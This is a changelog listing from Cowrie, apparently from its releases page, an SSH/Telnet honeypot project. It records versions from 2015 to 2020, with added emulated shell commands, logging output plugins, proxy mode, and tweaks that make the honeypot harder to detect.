    • Add uniq command (PeterSufliarsky)
    • Enhanced command substitution functionality.
    • Fix nc hang
    • Rename built-in user richard to phil, it's used as a detection mechanism.
    • Binary support for cat, grep and other commands
    • Azure Sentinel output plugin
    Source code(tar.gz)
    Source code(zip)
  • v2.1.0(May 10, 2020)

    • Deprecate Python 2.7. Still works but removed from testing suite and fixing 2.7 problems will no longer have priority.
    • Disable crashreporter
    • Updated ELK documentation and output plugin
    • tee command added. Updates to cat, dd and wc.
    • Fixed SSH compression issue with AsyncSSH client
    • AbuseIP output plugin.
    Source code(tar.gz)
    Source code(zip)
  • v2.0.2(Nov 5, 2019)

  • v2.0.1(Nov 2, 2019)

  • v1.9.7(Oct 4, 2019)

  • v2.0.0(Oct 15, 2019)

    • Based on @sgtpepperpt's excellent work for GSoC we are now releasing Cowrie 2.0.0 with Proxy Support! Cowrie can now run in Proxy Mode and run a set of real live systems in the back-end using Qemu for more accurate backend simulation.
    Source code(tar.gz)
    Source code(zip)
  • 1.6.0(Apr 4, 2019)

    Release 1.6.0

    • 2019-03-31 New documentation theme
    • 2019-03-23 Greynoise output plugin (@mzfr)
    • 2019-03-19 direct-tcp forwarding now written to databases (@gborges)
    • 2019-03-19 Reverse DNS output plugin (@mzfr)
    • 2019-03-17 Shell emulation pipe upgrade (@nunonovais)
    • 2019-03-14 Shell emulation environment variables improved (@nunonovais)
    • 2019-03-14 SSH crypto parameters now configurable in config file (@msharma)
    • 2019-03-13 Disable keyboard-interactive authentication by default with option to enable
    • 2019-03-13 Added wc, crontab, chpasswd command (@nunonovais)
    • 2019-
    • 2019-03-07 Output of ssh -V now configurable in cowrie.cfg with ssh_version setting
    • 2019-03-07 Multiple timezone support in cowrie.cfg timezone directive. Default timezone is now UTC for both cowrie.log and cowrie.json
    • 2019-03-12 Handle multiple password prompt. Option to enable or disable keyboard interactive prompt.
    Source code(tar.gz)
    Source code(zip)
  • 1.5.3(Feb 12, 2019)

    Release 1.5.3

    • 2019-01-27 Telnet NAWS negotiation removed to stop NMAP cowrie detection
    • 2019-01-27 Various fixes for Python2/3 compatibility
    • 2019-01-09 Documentation converted to ReStructuredText
    • 2018-12-04 Fixes for VT output plugin to only submit new files
    Source code(tar.gz)
    Source code(zip)
  • 1.5.2(Nov 20, 2018)

    Release 1.5.2

    • 2018-11-19 Fix tftp exception and tftp test
    • 2018-11-14 Remove dblog mechanism and splunk legacy output plugin.
    • 2018-11-01 Add Python3 support for Splunk output plugin
    • 2018-10-23 Improved free command
    • 2018-10-20 Improved uname command
    • 2018-10-16 Save VT results to JSON log
    Source code(tar.gz)
    Source code(zip)
  • 1.4.1(Aug 6, 2018)

  • v1.0.0-alpha(Aug 7, 2015)
